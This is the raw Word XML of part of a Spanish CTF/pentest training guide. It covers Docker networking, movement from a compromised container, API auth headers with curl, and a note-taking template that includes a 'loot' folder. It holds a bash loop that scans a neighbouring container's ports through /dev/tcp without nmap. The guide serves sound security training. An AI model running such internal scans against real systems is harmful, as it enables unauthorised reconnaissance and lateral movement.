              <w:t>ports: HOST:CONT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="719F547B" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Sólo lo expuesto aquí es alcanzable desde fuera. El resto vive en la red interna.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17010ED5" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A14AA1"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Comandos útiles desde el host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B8C0C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docker network ls                         # listado de redes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C783C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docker network inspect &lt;name&gt;             # subred, gateway, contenedores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6217571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docker ps --format 'table {{.Names}}\t{{.Networks}}\t{{.Ports}}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3473DEA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docker exec -it &lt;ctn&gt; sh                  # shell dentro de un contenedor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C30637C"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docker logs &lt;ctn&gt;                         # qué ha escrito el servicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47657133" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8F9898"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pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>Movimiento desde un contenedor comprometido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DDDFA8" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Si consigues ejecución dentro de un contenedor, ése contenedor tiene (por configuración) acceso a cierto subconjunto de la red interna. Usa las herramientas que tenga instaladas o las que puedas subir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404DDB49" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D9DABE"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Resolver vecinos por DNS interno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A97309"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getent hosts otro-servicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AED9B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15E40DB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Escanear desde dentro (sin nmap, con shell y /dev/tcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EEE81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for p in 22 80 3306 5000 6379 8080; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304AA68E"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(echo &gt; /dev/tcp/otro-servicio/$p) 2&gt;/dev/null \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE4542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&amp;&amp; echo "PORT $p abierto"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D295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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A7F241" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D15E760" w14:textId="0FB14242" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">✓ Autoevaluación: si en docker-compose una red está marcada con internal: true, ¿qué dirección IP NO podrás alcanzar desde uno de sus contenedores? ¿Y desde un contenedor con doble interfaz (esa red + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>una bridge normal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A06F9"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BLOQUE 9 — AUTENTICACIÓN EN APIS HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CA41AB" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="24" w:space="0" w:color="FCECD5"/>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="FCECD5"/>
          <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FCECD5"/>
          <w:right w:val="single" w:sz="24" w:space="0" w:color="FCECD5"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FCECD5"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>Tres esquemas de cabecera que verás todo el rato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2476FF8A" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="1E461457"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Basic — </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>usuario:password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> en base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0187119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Authorization: Basic dXNlcjpwYXNzd29yZA==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B9B7DA"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30CEE74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Bearer — token opaco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8CA116"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Authorization: Bearer eyJhbGciOiJIUzI1...     (típicamente un JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C853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1D602A2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Custom header — clave de API específica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027211AC" w14:textId="7740E57F"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X-API-Key: 8a3f1e9c7b...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1CA2D6" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9FE427" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cómo enviarlas con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55744826" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5700990A"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curl -s -H 'Authorization: Basic dXNlcjpwYXNzd29yZA==' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFBEBA0"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http://api.example.local/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B2E8A"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31856709"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curl -s -u user:password http://api.example.local/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE845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 curl construye el Authorization Basic por ti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB7965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240F1279"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kali$ curl -s -H 'Authorization: Bearer eyJ...' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71446C6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http://api.example.local/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF409F" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235EFD30" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓ Autoevaluación: tienes un token Bearer leído de un fichero restringido. ¿Cómo lo usas en curl SIN dejarlo en la línea de comandos visible para otros usuarios (history, ps)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E3D60D" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="24" w:space="0" w:color="F0A22E"/>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="F0A22E"/>
          <w:bottom w:val="single" w:sz="24" w:space="0" w:color="F0A22E"/>
          <w:right w:val="single" w:sz="24" w:space="0" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0A22E"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>BLOQUE 10 — METODOLOGÍA DE NOTAS DURANTE EL ATAQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9759C8" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>El éxito en un CTF (o en un pentest real) depende de tu cuaderno tanto como de tus herramientas. Esquema mínimo recomendado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C3C2E" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Una carpeta por máquina objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D6131" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>scans/ con outputs íntegros de nmap, gobuster, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B065C48" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>loot/ con todo lo extraído (hashes, .env, dumps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0F1AEF" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>notes.md con timeline de pasos y los flags capturados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54892880" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE3A313" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Plantilla útil para notes.md:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C3A295" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F3CAF2"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Objetivo: &lt;nombre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD84DA"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439E57FE"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Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA278FA"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nmap -sV: ports XX, YY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7007D028"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gobuster: /admin, /backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C9775A"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29F4BC6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Cadena de ataque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC3C8B"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1. [Fase X] técnica → flag: HELICE{...}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB6FC4"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2. [Fase X] ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665BB926"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67DAC5E3"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Credenciales obtenidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE6828F"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Usuario | Hash | Crackeado | Origen |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B93C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xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED0D505"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Tiempo invertido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C88DC3D"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Recon: 30 min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975C536" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>- Explotación: ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B732C" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261E2E8F" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓ Autoevaluación final: dibuja en un papel la metodología completa (recon → enum → exploit → lateral → privesc) usando una sola máquina objetivo ficticia que sólo expone un servicio HTTP y tiene un usuario con un binario sudo. Si puedes redactar QUÉ harías en cada fase aunque no sepas exactamente qué encontrarás, estás listo para abrir Operación Hélice Negra.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DD5DD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4E621" w14:textId="77777777" w:rsidR="00853F6A" w:rsidRDefault="00853F6A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0A7378B0" w14:textId="77777777" w:rsidR="00853F6A" w:rsidRDefault="00853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Segoe UI"/>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7260" w14:textId="77777777" w:rsidR="00527A1F" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61D8260A" wp14:editId="0BE366A6">
          <wp:extent cx="3333750" cy="276225"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="2127935378" name="Imagen 212793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333750" cy="276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B4F53" w14:textId="77777777" w:rsidR="00853F6A" w:rsidRDefault="00853F6A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C3AA3B0" w14:textId="77777777" w:rsidR="00853F6A" w:rsidRDefault="00853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408A" w14:textId="77777777" w:rsidR="00527A1F" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="107EBBB3" wp14:editId="2BA7020D">
          <wp:extent cx="1737815" cy="552203"/>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87684" cy="568049"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w14:paraId="3EA6BE62" w14:textId="77777777" w:rsidR="00B5081B" w:rsidRDefault="00B5081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C5F2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53D239C6"/>
    <w:lvl w:ilvl="0" w:tplc="B16E3EC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="984038C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EF6CA4E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="027003E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D2409AC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BE822A84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8DD223E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E3B8AD9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D7264EF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CB37008"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="622C89BC"/>
    <w:lvl w:ilvl="0" w:tplc="7836407A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="560" w:hanging="280"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F800BBCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="920" w:hanging="280"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="12188842">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E5347FCE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A5EE12C8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E75E9D4E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="64BCD6CC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D604D980">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7BC4A238">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="708C7FC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C9A87FA"/>
    <w:lvl w:ilvl="0" w:tplc="EA2A01AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="560" w:hanging="280"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="818406FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="920" w:hanging="280"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3FA04A94">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9F168C5C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1674BD34">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F13C0B6E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E7846714">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0734BD64">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5FC6C82A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1378237242">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="599141656">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1206722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1F"/>
    <w:rsid w:val="003004D4"/>
    <w:rsid w:val="004A2C85"/>
    <w:rsid w:val="00527A1F"/>
    <w:rsid w:val="0075764E"/>
    <w:rsid w:val="00853F6A"/>
    <w:rsid w:val="00864C57"/>
    <w:rsid w:val="00B5081B"/>
    <w:rsid w:val="00DC2C13"/>
    <w:rsid w:val="00DD5D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293CBCB"/>
  <w15:docId w15:val="{2AF6348E-122C-D74D-99D0-DF3075B44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FFFFFF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="100"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="84520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5081B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EncabezadoCar">
    <w:name w:val="Encabezado Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Encabezado"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B5081B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B5081B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PiedepginaCar">
    <w:name w:val="Pie de página Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Piedepgina"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B50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2585</Words>
